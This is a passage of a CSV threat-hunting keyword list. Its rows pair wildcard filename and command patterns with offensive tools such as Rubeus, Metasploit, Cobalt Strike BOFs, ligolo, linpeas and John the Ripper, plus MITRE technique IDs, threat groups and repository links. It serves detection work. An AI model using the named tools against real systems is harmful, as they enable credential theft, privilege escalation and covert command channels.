TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*lib/S4U.*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*LibcRealpathBufferUnderflow/RationalLove.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*libFuzzer-HOWTO.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*libnfc_crypto1_crack a0a1a2a3a4a5 0 A 4 B*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*libnspr_nspr_log_file_priv_esc.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*libreoffice2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*libs/bofalloc*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/wumb0/rust_bof,1,1,N/A,10,10,189,22,2023-03-03T22:53:02Z,2022-02-28T23:46:00Z -*libs/bofentry*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/wumb0/rust_bof,1,1,N/A,10,10,189,22,2023-03-03T22:53:02Z,2022-02-28T23:46:00Z -*libs/bofhelper*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/wumb0/rust_bof,1,0,N/A,10,10,189,22,2023-03-03T22:53:02Z,2022-02-28T23:46:00Z -*LibSnaffle.ActiveDirectory*,offensive_tool_keyword,Group3r,Find vulnerabilities in AD Group Policy,T1484.002 - T1069.002 - T1087.002,TA0007 - TA0040,N/A,N/A,AD Enumeration,https://github.com/Group3r/Group3r,1,1,N/A,N/A,5,488,47,2023-08-07T16:45:14Z,2021-07-05T05:05:42Z -*LibSnaffle.FileDiscovery*,offensive_tool_keyword,Group3r,Find vulnerabilities in AD Group Policy,T1484.002 - T1069.002 - T1087.002,TA0007 - TA0040,N/A,N/A,AD Enumeration,https://github.com/Group3r/Group3r,1,0,N/A,N/A,5,488,47,2023-08-07T16:45:14Z,2021-07-05T05:05:42Z -*libSSH-Authentication-Bypass*,offensive_tool_keyword,POC,LibSSH Authentication bypass CVE-2018-10933 exploitation tool,T1210 - T1573 - T1553 - T1003 - T1059,TA0006 - TA0011 - TA0008,N/A,N/A,Exploitation tools,https://github.com/nikhil1232/LibSSH-Authentication-Bypass,1,0,N/A,N/A,1,6,2,2018-12-19T15:46:37Z,2018-12-19T15:33:00Z -*libwireshark16*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*libwireshark-data*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*libwireshark-dev*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*libwiretap13*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*libxpc_mitm_ssudo.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*libxselinux.old*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*libxselinux.so*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*lightsout.py*,offensive_tool_keyword,LightsOut,Generate an obfuscated DLL that will disable AMSI & ETW,T1027.003 - T1059.001 - T1082,TA0005 - TA0002 - TA0004,N/A,N/A,Exploitation tools,https://github.com/icyguider/LightsOut,1,1,N/A,N/A,3,243,29,2023-06-09T10:39:36Z,2023-06-01T14:57:44Z -*LightsOut-master.zip*,offensive_tool_keyword,LightsOut,Generate an obfuscated DLL that will disable AMSI & ETW,T1027.003 - T1059.001 - T1082,TA0005 - TA0002 - TA0004,N/A,N/A,Exploitation tools,https://github.com/icyguider/LightsOut,1,1,N/A,N/A,3,243,29,2023-06-09T10:39:36Z,2023-06-01T14:57:44Z -*ligolo.lan*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,0,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*ligolo_darwin*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*ligolo_linux*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*ligolo_windows*.exe*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*ligolo-master*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*ligolo-ng -selfcert*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*LinEnum.sh*,offensive_tool_keyword,LinEnum,Scripted Local Linux Enumeration & Privilege Escalation Checks,T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018,TA0007 - TA0009 - TA0002 - TA0003 - TA0001,N/A,N/A,Privilege Escalation,https://github.com/rebootuser/LinEnum,1,1,N/A,N/A,10,6220,1947,2023-09-06T18:02:29Z,2013-08-20T06:26:58Z -*LinEnum-master.ip*,offensive_tool_keyword,LinEnum,Scripted Local Linux Enumeration & Privilege Escalation Checks,T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018,TA0007 - TA0009 - TA0002 - TA0003 - TA0001,N/A,N/A,Privilege Escalation,https://github.com/rebootuser/LinEnum,1,1,N/A,N/A,10,6220,1947,2023-09-06T18:02:29Z,2013-08-20T06:26:58Z -*link_tcp 127.0.0.1 *,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,0,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*linkedin2username.py -u*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*LinkedInt*,offensive_tool_keyword,LinkedInt,LinkedInt: A LinkedIn scraper for reconnaissance during adversary simulation,T1593 - T1594 - T1595 - T1567,TA0007 - TA0009 - TA0004,N/A,N/A,Information Gathering,https://github.com/mdsecactivebreach/LinkedInt,1,0,N/A,N/A,5,463,112,2023-05-23T23:34:22Z,2017-07-12T12:58:47Z -*linpeas_builder.py*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*linpeas_darwin_amd64*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*linpeas_darwin_amd64*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*linpeas_darwin_arm64*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*linpeas_darwin_arm64*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*linpeas_fat.sh*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*linpeas_linux_386*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*linpeas_linux_386*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*linpeas_linux_amd64*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*linpeas_linux_amd64*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*linpeas_linux_arm*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*linpeas_linux_arm64*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*linux_hostrecon*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*linux_hostrecon.*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*Linux_LPE_eBPF_CVE*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*linux_sudo_cve-2017-1000367.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*linux_trap_command.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*LinuxARMLELF32.py*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,1,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -*linux-exploit-suggester*,offensive_tool_keyword,BeRoot,Privilege Escalation Project - Windows / Linux / Mac ,T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007,TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010,N/A,N/A,Privilege Escalation,https://github.com/AlessandroZ/BeRoot,1,1,N/A,N/A,10,2262,488,2022-02-08T10:30:38Z,2017-04-14T12:47:31Z -*linux-exploit-suggester*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*linux-exploit-suggester.sh*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*linuxprivchecker*,offensive_tool_keyword,linuxprivchecker,search for common privilege escalation vectors such as world writable files. misconfigurations. clear-text passwords and applicable exploits,T1210.001 - T1082 - T1088 - T1547.001,TA0002 - TA0004 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py,1,0,N/A,N/A,10,1344,483,2022-01-31T10:32:08Z,2016-04-19T13:31:46Z -*linuxprivchecker*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*linux-rds-exploit.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*linux-smart-enumeration.sh*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*linux-smart-enumeration-master*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,1,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*linWinPwn-*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z 